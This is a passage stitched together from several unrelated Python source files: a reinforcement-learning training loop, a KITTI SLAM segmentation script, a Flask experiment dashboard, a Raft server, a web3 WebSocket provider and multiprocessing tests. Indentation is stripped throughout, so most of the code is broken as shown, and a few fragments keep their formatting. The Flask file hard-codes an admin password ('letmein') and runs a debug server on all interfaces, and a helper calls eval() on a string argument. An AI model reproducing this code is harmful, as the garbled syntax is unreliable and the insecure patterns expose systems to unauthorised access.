if_train = not ((if_allow_break and if_reach_goal)
or evaluator.total_step > break_step
or os.path.exists(f'{cwd}/stop'))
self.pipe0.send((if_train, if_save))
print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
evaluator.save_or_load_recoder(if_save=True)
# class PipeVectorEnv:
# def __init__(self, args):
# self.env_num = args.env_num
# self.pipes = [mp.Pipe() for _ in range(self.env_num)]
# self.pipe0s = [pipe[0] for pipe in self.pipes]
#
# env = build_env(args.eval_env)
# self.max_step = env.max_step
# self.env_name = env.env_name
# self.state_dim = env.state_dim
# self.action_dim = env.action_dim
# self.action_max = env.action_max
# self.if_discrete = env.if_discrete
# self.target_return = env.target_return
# del env
#
# self.process = list()
# for env_id in range(args.env_num):
# self.process.append(mp.Process(target=self.run, args=(args, env_id)))
# args.random_seed += 1 # set different for each env
# # [p.start() for p in self.process]
#
# def reset(self):
# vec_state = [pipe0.recv() for pipe0 in self.pipe0s]
# return vec_state
#
# def step(self, vec_action): # pipe0_step
# for i in range(self.env_num):
# self.pipe0s[i].send(vec_action[i])
# return [pipe0.recv() for pipe0 in self.pipe0s] # list of (state, reward, done)
#
# def run(self, args, env_id):
# np.random.seed(args.random_seed)
#
# env = build_env(args.eval_env, if_print=False)
# pipe1 = self.pipes[env_id][1]
# del args
#
# state = env.reset()
# pipe1.send(state)
#
# while True:
# action = pipe1.recv()
# state, reward, done, _ = env.step(action)
# pipe1.send((env.reset() if done else state, reward, done))
#
# # def check(self):
# # vec_state = self.reset()
# # ten_state = np.array(vec_state)
# # print(ten_state.shape)
# #
# # vec_action = np.array(((0.0, 1.0, 0.0),
# # (0.0, 0.5, 0.0),
# # (0.0, 0.1, 0.0),))[:self.env_num]
# # assert self.env_num <= 3
# #
# # trajectory_list = list()
# # for _ in range(8):
# # s_r_d_list = self.step(vec_action)
# # ten_state = np.array([s_r_d[0] for s_r_d in s_r_d_list])
# # print(ten_state.shape)
# # trajectory_list.append(s_r_d_list)
# #
# # trajectory_list = list(map(list, zip(*trajectory_list))) # 2D-list transpose
# # print('| shape of trajectory_list:', len(trajectory_list), len(trajectory_list[0]))
def get_comm_data(agent):
act = list(agent.act.parameters())
cri_optim = get_optim_parameters(agent.cri_optim)
if agent.cri is agent.act:
cri = None
act_optim = None
else:
cri = list(agent.cri.parameters())
act_optim = get_optim_parameters(agent.act_optim)
act_target = list(agent.act_target.parameters()) if agent.if_use_act_target else None
cri_target = list(agent.cri_target.parameters()) if agent.if_use_cri_target else None
return act, act_optim, cri, cri_optim, act_target, cri_target # data
"""Utils"""
def get_num_learner(visible_gpu):
assert isinstance(visible_gpu, str) # visible_gpu may be in {'0', '1', '1,', '1,2', '1,2,'}
visible_gpu = eval(visible_gpu)
num_learner = 1 if isinstance(visible_gpu, int) else len(visible_gpu)
return num_learner
def process_safely_terminate(process):
for p in process:
try:
p.kill()
except OSError as e:
print(e)
pass
def get_optim_parameters(optim): # for avg_update_optim()
params_list = list()
for params_dict in optim.state_dict()['state'].values():
params_list.extend([t for t in params_dict.values() if isinstance(t, torch.Tensor)])
return params_list
def avg_update_optim(dst_optim, src_optim_param, device):
for dst, src in zip(get_optim_parameters(dst_optim), src_optim_param):
dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
# dst.data.copy_(src.data * tau + dst.data * (1 - tau))
def avg_update_net(dst_net, src_net_param, device):
for dst, src in zip(dst_net.parameters(), src_net_param):
dst.data.copy_((dst.data + src.data.to(device)) * 0.5)
|
RDR.py
|
from maskrcnn_benchmark.config import cfg
from demo.predictor import COCODemo
from RDRSeg import RDRSeg
from sptam.dynaseg import DynaSegt,DynaSeg
from sptam.msptam import SPTAM, stereoCamera
from sptam.components import Camera
from sptam.components import StereoFrame
from sptam.feature import ImageFeature
from sptam.params import ParamsKITTI
from sptam.dataset import KITTIOdometry
# import orbslam2
import g2o
import sys
import cv2 as cv
import fcntl
import numpy as np
import os
import shutil
import time
from threading import Thread
def load_images(path_to_sequence):
res = [os.path.join(path_to_sequence, img) for img in os.listdir(path_to_sequence)]
res.sort()
return res
def load_times(path_to_sequence):
timestamps = []
with open(os.path.join(path_to_sequence, 'times.txt')) as times_file:
for line in times_file:
if line.strip():
timestamps.append(float(line))
return timestamps
def pose_to_transformation(pose):
res = np.zeros((4,4))
for i in range(3):
res[i,:3] = pose[4*i+1:4*(i+1)]
res[i,3] = pose[4*i]
res[3,3] = 1
res = np.linalg.inv(res)
return res
def save_trajectory(trajectory, filename):
try:
with open(filename, 'w') as traj_file:
fcntl.flock(traj_file, fcntl.LOCK_EX | fcntl.LOCK_NB)
traj_file.writelines('{r00} {r01} {r02} {t0} {r10} {r11} {r12} {t1} {r20} {r21} {r22} {t2}\n'.format(
r00=repr(r00),
r01=repr(r01),
r02=repr(r02),
t0=repr(t0),
r10=repr(r10),
r11=repr(r11),
r12=repr(r12),
t1=repr(t1),
r20=repr(r20),
r21=repr(r21),
r22=repr(r22),
t2=repr(t2)
) for stamp, r00, r01, r02, t0, r10, r11, r12, t1, r20, r21, r22, t2 in trajectory)
traj_file.close()
return 1
except Exception:
return 0
def main(orb_path, data_path, device, save, sequence):
sequence_path = os.path.join(data_path, sequence)
vocab_path = os.path.join(orb_path, 'Vocabulary/ORBvoc.txt')
file_path = os.path.join(sequence_path, 'image_2')
left_filenames = load_images(file_path)
file_path = os.path.join(sequence_path, 'image_3')
right_filenames = load_images(file_path)
timestamps = load_times(sequence_path)
prob_path = os.path.join('/usr/stud/linp/storage/user/linp/prob/', sequence)
prob_filenames = load_images(prob_path)
config_file = '../../maskrcnn-benchmark/configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml'
cfg.merge_from_file(config_file)
# manually override some options
cfg.merge_from_list(["MODEL.DEVICE", device])
coco_demo = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.7,
)
dilation = 2
kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (2 * dilation + 1, 2 * dilation + 1))
depth_path = os.path.join('/usr/stud/linp/storage/user/linp/depth/',sequence)
iml = cv.imread(left_filenames[0], cv.IMREAD_UNCHANGED)
config = stereoCamera(sequence)
num_images = len(left_filenames)
rdrseg = RDRSeg(iml, coco_demo, depth_path, kernel, config)
ins = int(sequence)
if ins < 3:
settings_path = os.path.join(orb_path, 'Examples/Stereo/KITTI00-02.yaml')
elif ins == 3:
settings_path = os.path.join(orb_path, 'Examples/Stereo/KITTI03.yaml')
else:
settings_path = os.path.join(orb_path, 'Examples/Stereo/KITTI04-12.yaml')
# slam0 = orbslam2.System(vocab_path, settings_path, orbslam2.Sensor.STEREO)
# slam0.set_use_viewer(False)
# slam0.initialize()
#
# slam = orbslam2.System(vocab_path, settings_path, orbslam2.Sensor.STEREO)
# slam.set_use_viewer(False)
# slam.initialize()
params = ParamsKITTI()
dataset = KITTIOdometry(sequence_path)
sptam = SPTAM(params)
cam = Camera(
dataset.cam.fx, dataset.cam.fy, dataset.cam.cx, dataset.cam.cy,
dataset.cam.width, dataset.cam.height,
params.frustum_near, params.frustum_far,
dataset.cam.baseline)
if save == '1':
dpath = 'pmask/rdr{}/'.format(sequence) #
if os.path.exists(dpath):
shutil.rmtree(dpath)
os.mkdir(dpath)
start_time = time.time()
for idx in range(num_images):
print('{} frame'.format(idx))
left_image = cv.imread(left_filenames[idx], cv.IMREAD_UNCHANGED)
right_image = cv.imread(right_filenames[idx], cv.IMREAD_UNCHANGED)
prob_image = cv.imread(prob_filenames[idx])
timestamp = timestamps[idx]
# left_mask = np.ones((rdrseg.h, rdrseg.w, 1), dtype=np.uint8)
# right_mask = np.ones((rdrseg.h, rdrseg.w, 1), dtype=np.uint8)
# slam0.process_image_stereo(left_image[:, :, ::-1], right_image[:, :, ::-1], left_mask, right_mask, timestamp)
# trans = pose_to_transformation(slam0.get_trajectory_points()[-1])
featurel = ImageFeature(left_image, params)
featurer = ImageFeature(right_image, params)
t = Thread(target=featurer.extract)
t.start()
featurel.extract()
t.join()
frame = StereoFrame(idx, g2o.Isometry3d(), featurel, featurer, cam, timestamp=timestamp)
if not sptam.is_initialized():
sptam.initialize(frame)
else:
sptam.track(frame)
if idx % 3 == 0:
if idx:
rdrseg.update(left_image, right_image, idx, frame)
c = rdrseg.rdr_seg_rec(left_image, prob_image, idx,frame)
if save == '1':
cv.imwrite(os.path.join(dpath, '{0:06}.png'.format(idx)), c)
# slam.process_image_stereo(left_image[:, :, ::-1], right_image[:, :, ::-1], left_mask, right_mask, timestamp)
# i = 0
# result_path = 'rdr/d{}{}.txt'.format(sequence,i)
# while True:
# if not os.path.exists(result_path):
# s_flag = save_trajectory(slam.get_trajectory_points(), result_path)
# if s_flag:
# print(result_path)
# break
# i += 1
# result_path = 'rdr/d{}{}.txt'.format(sequence, i)
#
# slam.shutdown()
mean_time = (time.time() - start_time) / num_images
print('sequence ',sequence)
print('mean process time: {}'.format(round(mean_time,2)))
if __name__ == '__main__':
if len(sys.argv) != 6:
print('Usage: ./orbslam_stereo_kitti path_to_orb path_to_data device save_img sequence')
sys.exit(1)
main(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
|
api.py
|
# app.py
from os import name
import re
import threading
from flask import Flask, render_template, send_file, Response, abort, jsonify, request, url_for, redirect, logging
from sqlalchemy.sql import text
# Para o upload de arquivos
from werkzeug.utils import secure_filename
# Para a autenticação
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash
# Experiments Models
from Model import *
auth = HTTPBasicAuth()
users = {
"admin": generate_password_hash("letmein")
}
@auth.verify_password
def verify_password(username, password):
if username in users and \
check_password_hash(users.get(username), password):
return username
app = Flask(__name__, template_folder="templates")
app.config['MAX_CONTENT_LENGTH'] = 1024 * 1024
app.config['UPLOAD_EXTENSIONS'] = ['.sql']
app.config['UPLOAD_PATH'] = 'uploads/'
@app.route('/')
def hello():
exp = db.query(Experiment).all()
qtd = len(exp)
return render_template("index.html", count=qtd, experiments=exp)
@app.route('/experiment/<id>')
def detailExperiment(id):
exp = db.query(Experiment).filter_by(id=id).first()
return render_template("expDetail.html", exp=exp)
def runExperiment(id):
db.query(Experiment).filter_by(id=id).first().run()
@app.route('/experiment/run/<id>')
@auth.login_required
def showRunStatus(id):
process = threading.Thread(target=runExperiment, args=(id,))
process.start()
return render_template("run.html", user=auth.current_user())
@app.route('/experiment/run/progress')
@auth.login_required
def getProgress():
isRun = False
progress = 0
toEnd = 999999999
with open("COOJA.log", "r") as f:
for line in f.readlines():
data = line.split(']')[3]
if data.startswith(' - Test script activated'):
isRun = True
if data.startswith(" - Test script"):
if data.startswith(" - Test script at"):
exp = re.compile(r' - Test script at (\d+\.\d+|\d+)%, done in (\d+\.\d+|\d+) sec').match(data)
progress = int(float(exp.group(1)))
toEnd = exp.group(2)
if data.startswith(' - Test script finished'):
isRun = False
toEnd = 0
progress = 100
with open('COOJA.testlog') as test_log:
log = len(test_log.readlines())
status = {'run': isRun, 'progress': progress, 'doneIn': toEnd, 'logFile': log}
return jsonify(status)
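# Illustrative COOJA.log lines the parser above expects (format inferred from the
# prefix checks and the regular expression; the bracketed fields before the payload
# are elided here):
#   [...][...][...] - Test script activated
#   [...][...][...] - Test script at 37.5%, done in 120.0 sec
#   [...][...][...] - Test script finished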
@app.route('/experiment/run/<id>/metrics')
@auth.login_required
def extractMetricFromRun(id):
run = db.query(Run).filter_by(id=id).first()
run.metric = Metrics(run)
#db.save(run)
db.commit()
return render_template("runDetail.html", run=run , user=auth.current_user())
@app.route('/experiment/add/', methods=['GET'])
@auth.login_required
def showExperimentAdd():
experiments = db.query(Experiment).all()
qtd = len(experiments)
return render_template("expAdd.html", count=qtd, experiments=experiments, user=auth.current_user())
@app.route('/experiment/add/', methods=['POST'])
@auth.login_required
def executeExperimentAdd():
expName = request.form['expName']
expFile = request.form['expFile']
exp = Experiment(name=expName,experimentFile=expFile)
db.add(exp)
db.commit()
experiments = db.query(Experiment).all()
qtd = len(experiments)
return render_template("expAdd.html", count=qtd, experiments=experiments, user=auth.current_user())
@app.route('/run/<id>')
def detailRun(id):
run = db.query(Run).filter_by(id=id).first()
hasMetric = False
if run.metric is None:
hasMetric = True
return render_template("runDetail.html", run=run, hasMetric=hasMetric)
@app.route('/run/summary/<id>')
def summaryRun(id):
run = db.query(Run).filter_by(id=id).first()
return render_template("runSummary.html", run=run)
@app.route('/metrics/slotframe/<size>')
def metricBySlotFrame(size):
retorno = []
runs = db.query(Run).all()
for r in runs:
parameters = r.parameters
if parameters['TSCH_SCHEDULE_CONF_DEFAULT_LENGTH'] == size:
retorno.append(r)
return render_template("metricSlotFrame.html", id=size, retorno=retorno)
@app.route('/metrics/sendrate/<interval>')
def metricBySendInterval(interval):
retorno = []
runs = db.query(Run).all()
for r in runs:
parameters = r.parameters
if parameters['APP_SEND_INTERVAL_SEC'] == interval:
retorno.append(r)
return render_template("metricSentInterval.html", id=interval, retorno=retorno)
@app.route('/admin/db/show', methods=['GET'])
@auth.login_required
def showDB():
import sqlite3
global engine
print ("Engine:", engine)
exp = db.query(Experiment).all()
qtd = len(exp)
return render_template("index.html", count=qtd, experiments=exp)
@app.route('/admin/db/switch', methods=['GET'])
@auth.login_required
def switchDB():
import sqlite3
global engine
print ("Engine:", engine)
exp = db.query(Experiment).all()
qtd = len(exp)
fisico = sqlite3.connect(DBName)
fisico.backup(memConnection)
engine = memEngine
return render_template("index.html", count=qtd, experiments=exp)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=9001, debug=True)
|
raft_server.py
|
import argparse
import logging
import random
import threading
import zlib
from threading import Thread
from time import sleep
from helper import helper
from persistence import synchronized_log
from rpc.messages import ClientData, ClientDataResponse
from rpc.rpc_handler import RPCHandler
from rpc.serializer import RaftSerializer
from raft_config import RaftConfig
from states.states import Follower, Candidate, Leader
logger = logging.getLogger(__name__)
log_format = '%(asctime)s - %(levelname)s - %(module)s - %(threadName)s - %(message)s'
# logging.basicConfig(format=log_format, filename=RaftConfig().LOG_FILE, level=RaftConfig().LOG_LEVEL)
logging.basicConfig(format=log_format, level=RaftConfig().LOG_LEVEL)
class ServernameFilter(logging.Filter):
def __init__(self, servername):
logging.Filter.__init__(self)
self.servername = servername
def filter(self, record):
record.servername = self.servername
return True
class ZLibCompressor(object):
def compress(self, data):
return zlib.compress(data)
def decompress(self, data):
return zlib.decompress(data)
class NoOpEncryptor(object):
def encrypt(self, data):
return data
def decrypt(self, data):
return data
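# A drop-in alternative compressor, shown only as a sketch: RaftServer below accepts any
# class exposing compress()/decompress() through its `compressor` argument (and,
# analogously, encrypt()/decrypt() through `encryptor`). bz2 is part of the standard
# library; it usually compresses better than zlib at the cost of speed.
import bz2


class BZ2Compressor(object):
    def compress(self, data):
        return bz2.compress(data)

    def decompress(self, data):
        return bz2.decompress(data)

# Example wiring (hypothetical peer list):
#   server = RaftServer([("localhost", 48001)], compressor=BZ2Compressor)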
class RaftThread(Thread):
def __init__(self, hostname, group=None, target=None, name=None,
args=(), kwargs=None):
super(RaftThread, self).__init__(group, target, name,
args, kwargs)
self.name = hostname + " - " + self.name
class RaftServer(object):
def __init__(self, peers, hostname=RaftConfig().HOSTNAME, port=RaftConfig().PORT,
compressor=ZLibCompressor, encryptor=NoOpEncryptor, rpc_handler=RPCHandler,
serializer=RaftSerializer):
self.peers = peers
self.hostname = hostname
logger.addFilter(ServernameFilter(self.hostname))
self.port = port
self._state = None
self.__compressor = compressor()
self.__encryptor = encryptor()
self.__rpc_handler = rpc_handler(self.hostname, self.port, self._handle_msg)
self.__serializer = serializer()
self.__send_threads = []
self.shutdown = False
self._timeout_watcher_thread = RaftThread(self.hostname, target=self._timeout_thread_watcher)
self._last_valid_rpc = helper.get_current_time_millis()
self._timeout_watcher_thread.start()
self._message_lock = threading.Lock()
@property
def state(self):
return self._state
@state.setter
def state(self, state):
logger.info("{}: Switching state from {} to {}".format(self.hostname, self._state.__class__.__name__,
state.__class__.__name__))
self._state = state
def _timeout_thread_watcher(self):
while not self.shutdown:
# Sleep a random time before starting a vote
random.seed(helper.get_current_time_nanos())
sleep_seconds = random.randint(
RaftConfig().ELECTION_TIMEOUT_IN_MILLIS_MIN,
RaftConfig().ELECTION_TIMEOUT_IN_MILLIS_MAX) / 1000.0
logger.debug("{}: Sleeping {} seconds before deciding to start a vote".format(self.hostname, sleep_seconds))
sleep(sleep_seconds)
if len(self.peers) > 0 and not isinstance(self.state, Leader) and not isinstance(self.state, Candidate):
current_time_millis = helper.get_current_time_millis()
if (current_time_millis - self._last_valid_rpc) > RaftConfig().ELECTION_TIMEOUT_IN_MILLIS_MIN:
logger.info("{}: No valid RPC received in the last {} milliseconds, switching to Candidate"
.format(self.hostname, (current_time_millis - self._last_valid_rpc)))
self.state = self.state.switch_to(Candidate)
else:
logger.debug("{}: Received message from Leader in time, staying a Follower".format(self.hostname))
def _handle_msg(self, string):
self._last_valid_rpc = helper.get_current_time_millis()
obj = self._deserialize(string)
self._message_lock.acquire()
resp_obj = self.state.handle(obj)
self._message_lock.release()
# wait until a new leader is found before denying a client a request
if isinstance(resp_obj, ClientDataResponse):
if not resp_obj.success and resp_obj.leaderId is None:
while not self.shutdown and self.state.currentLeaderId is None:
logger.error("Received client request but currently no leader, wait 1 second...")
sleep(1)
string = None
if resp_obj is not None:
string = self._serialize(resp_obj)
return string
def _serialize(self, obj):
if obj is None:
return None
serialized_string = self.__serializer.serialize(obj)
serialized_string = self.__compressor.compress(serialized_string)
serialized_string = self.__encryptor.encrypt(serialized_string)
return serialized_string
def _deserialize(self, string):
if string is None or string == '':
return None
string = self.__encryptor.decrypt(string)
string = self.__compressor.decompress(string)
obj = self.__serializer.deserialize(string)
return obj
def start(self):
logger.info("Starting server...")
logger.info("Peers: {}".format(self.peers))
if len(self.peers) == 0:
logger.info("No peers configured, starting as Leader")
self._state = Leader(self, 0, None, synchronized_log.SynchronizedLog(), None)
else:
logger.info("{} peers configured, starting as Follower".format(len(self.peers)))
self._state = Follower(self, 0, None, synchronized_log.SynchronizedLog(), None)
self.__rpc_handler.startup()
logger.info("Server listening on {}:{}".format(self.hostname, self.port))
def send(self, hostname, port, obj):
serialized_string = self._serialize(obj)
return self._deserialize(self.__rpc_handler.send(hostname, port, serialized_string))
def _send_and_handle(self, hostname, port, obj):
logger.debug("Sending message to {}".format(hostname))
serialized_string = self._serialize(obj)
send_time = helper.get_current_time_millis()
resp_string = self.__rpc_handler.send(hostname, port, serialized_string)
resp_time = helper.get_current_time_millis()
if resp_time - send_time > 50:
logger.warning("{}: It took {}ms to send a message to and receive a response from: {}:{}".format(
self.hostname, (resp_time - send_time), hostname, port))
self._handle_msg(resp_string)
def send_and_handle_async(self, hostname, port, obj):
t = RaftThread(self.hostname, target=self._send_and_handle, args=(hostname, port, obj))
self.__send_threads.append(t)
t.start()
def broadcast(self, obj):
for peer in self.peers:
host = peer
port = int(RaftConfig().PORT)
if isinstance(peer, tuple):
host = peer[0]
port = int(peer[1])
self.send_and_handle_async(host, port, obj)
def stop(self):
self.shutdown = True
self.__rpc_handler.shutdown()
for t in self.__send_threads:
# join() waits for each sender thread to finish instead of busy-waiting
t.join()
self._timeout_watcher_thread.join()
logger.info("Server stopped successfully.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Start a new server or send a message as a client")
parser.add_argument("--test", action="store_true")
parser.add_argument("--server", action="store_true")
parser.add_argument("--peers", type=str, default=RaftConfig().PORT)
parser.add_argument("--client", action="store_true")
parser.add_argument("--host", type=str, default=RaftConfig().HOSTNAME)
parser.add_argument("--port", type=int, default=RaftConfig().PORT)
args = parser.parse_args()
# python raft_server.py --server --host andi-vbox --port 48000 --peers localhost:48001,127.0.0.1:48002
# python raft_server.py --server --host localhost --port 48001 --peers andi-vbox:48000,127.0.0.1:48002
# python raft_server.py --server --host 127.0.0.1 --port 48002 --peers localhost:48001,andi-vbox:48000
if args.server:
peer_tuples = []
for peer in args.peers.split(","):
splitted_peer = peer.split(":")
peer_tuples.append((splitted_peer[0], int(splitted_peer[1])))
server = RaftServer(peer_tuples, hostname=args.host, port=args.port)
try:
server.start()
except Exception as e:
logger.exception(e)
server.stop()
exit(1)
if args.client:
try:
server = RaftServer([])
logger.info("Connecting to: {}:{}".format(args.host, args.port))
resp = server.send(args.host, args.port, ClientData("hello world"))
if resp is not None:
logger.info("Success: {}, Leader: {}".format(resp.success, resp.leaderId))
server.stop()
except Exception as e:
logger.exception(e)
exit(1)
if args.test or (not args.client and not args.server):
server1 = RaftServer([("localhost", 48001), ("andi-vbox", 48002)], hostname="127.0.0.1", port=48000)
server2 = RaftServer([("127.0.0.1", 48000), ("localhost", 48001)], hostname="andi-vbox", port=48002)
server3 = RaftServer([("andi-vbox", 48002), ("127.0.0.1", 48000)], hostname="localhost", port=48001)
server1.start()
server2.start()
server3.start()
|
Utility.py
|
from functools import wraps
from threading import Thread
def threaded(fn):
"""Decorator: run the wrapped function in a new Thread and return that Thread."""
@wraps(fn)
def wrapper(*args, **kwargs):
thread = Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
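# Illustrative usage sketch (not part of the original module): a function
# decorated with @threaded runs in a fresh Thread on every call, and the
# call itself returns the Thread object so the caller may join() it.
#
#     @threaded
#     def download(url):          # 'download' and the URL are hypothetical
#         ...                     # long-running work
#
#     t = download("http://example.com")   # returns immediately
#     t.join()                             # optionally wait for completion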
|
websocket.py
|
import asyncio
import json
import logging
import os
from threading import (
Thread,
)
from types import (
TracebackType,
)
from typing import (
Any,
Type,
)
from eth_typing import (
URI,
)
import websockets
from web3.exceptions import (
ValidationError,
)
from web3.providers.base import (
JSONBaseProvider,
)
from web3.types import (
RPCEndpoint,
RPCResponse,
)
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop: asyncio.AbstractEventLoop) -> None:
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def _get_threaded_loop() -> asyncio.AbstractEventLoop:
new_loop = asyncio.new_event_loop()
thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
thread_loop.start()
return new_loop
def get_default_endpoint() -> URI:
return URI(os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546'))
class PersistentWebSocket:
def __init__(
self, endpoint_uri: URI, loop: asyncio.AbstractEventLoop, websocket_kwargs: Any
) -> None:
self.ws: websockets.WebSocketClientProtocol = None
self.endpoint_uri = endpoint_uri
self.loop = loop
self.websocket_kwargs = websocket_kwargs
async def __aenter__(self) -> websockets.WebSocketClientProtocol:
if self.ws is None:
self.ws = await websockets.connect(
uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
)
return self.ws
async def __aexit__(
self, exc_type: Type[BaseException], exc_val: BaseException, exc_tb: TracebackType
) -> None:
if exc_val is not None:
try:
await self.ws.close()
except Exception:
pass
self.ws = None
class WebsocketProvider(JSONBaseProvider):
logger = logging.getLogger("web3.providers.WebsocketProvider")
_loop = None
def __init__(
self,
endpoint_uri: URI = None,
websocket_kwargs: Any = None,
websocket_timeout: int = DEFAULT_WEBSOCKET_TIMEOUT,
) -> None:
self.endpoint_uri = endpoint_uri
self.websocket_timeout = websocket_timeout
if self.endpoint_uri is None:
self.endpoint_uri = get_default_endpoint()
if WebsocketProvider._loop is None:
WebsocketProvider._loop = _get_threaded_loop()
if websocket_kwargs is None:
websocket_kwargs = {}
else:
found_restricted_keys = set(websocket_kwargs.keys()).intersection(
RESTRICTED_WEBSOCKET_KWARGS
)
if found_restricted_keys:
raise ValidationError(
'{0} are not allowed in websocket_kwargs, '
'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
)
self.conn = PersistentWebSocket(
self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
)
super().__init__()
def __str__(self) -> str:
return "WS connection {0}".format(self.endpoint_uri)
async def coro_make_request(self, request_data: bytes) -> RPCResponse:
async with self.conn as conn:
await asyncio.wait_for(
conn.send(request_data),
timeout=self.websocket_timeout
)
return json.loads(
await asyncio.wait_for(
conn.recv(),
timeout=self.websocket_timeout
)
)
def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
self.logger.debug("Making request WebSocket. URI: %s, "
"Method: %s", self.endpoint_uri, method)
request_data = self.encode_rpc_request(method, params)
future = asyncio.run_coroutine_threadsafe(
self.coro_make_request(request_data),
WebsocketProvider._loop
)
return future.result()
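# Illustrative usage sketch (assumes a JSON-RPC node is reachable on the
# default ws://127.0.0.1:8546 endpoint; not part of the original module):
#
#     provider = WebsocketProvider("ws://127.0.0.1:8546")
#     reply = provider.make_request("web3_clientVersion", [])
#     # 'reply' is the decoded JSON-RPC response dict, e.g.
#     # {"jsonrpc": "2.0", "id": 0, "result": "<client version string>"}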
|
__init__.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import test.support
import test.support.script_helper
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocess.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocess as multiprocessing
import multiprocess.dummy
import multiprocess.connection
import multiprocess.managers
import multiprocess.heap
import multiprocess.pool
from multiprocess import util
try:
from multiprocess import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocess.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
def latin(s):
return s.encode('latin')
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocess.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except (AttributeError, ValueError, OSError):
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
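# Illustrative note (not part of the original test suite): the tests below
# wrap a blocking call in TimingWrapper so they can assert both its return
# value and how long it blocked, e.g.
#
#     get = TimingWrapper(queue.get)
#     get(True, 0.1)     # call through the wrapper as usual
#     get.elapsed        # seconds the wrapped call took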
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
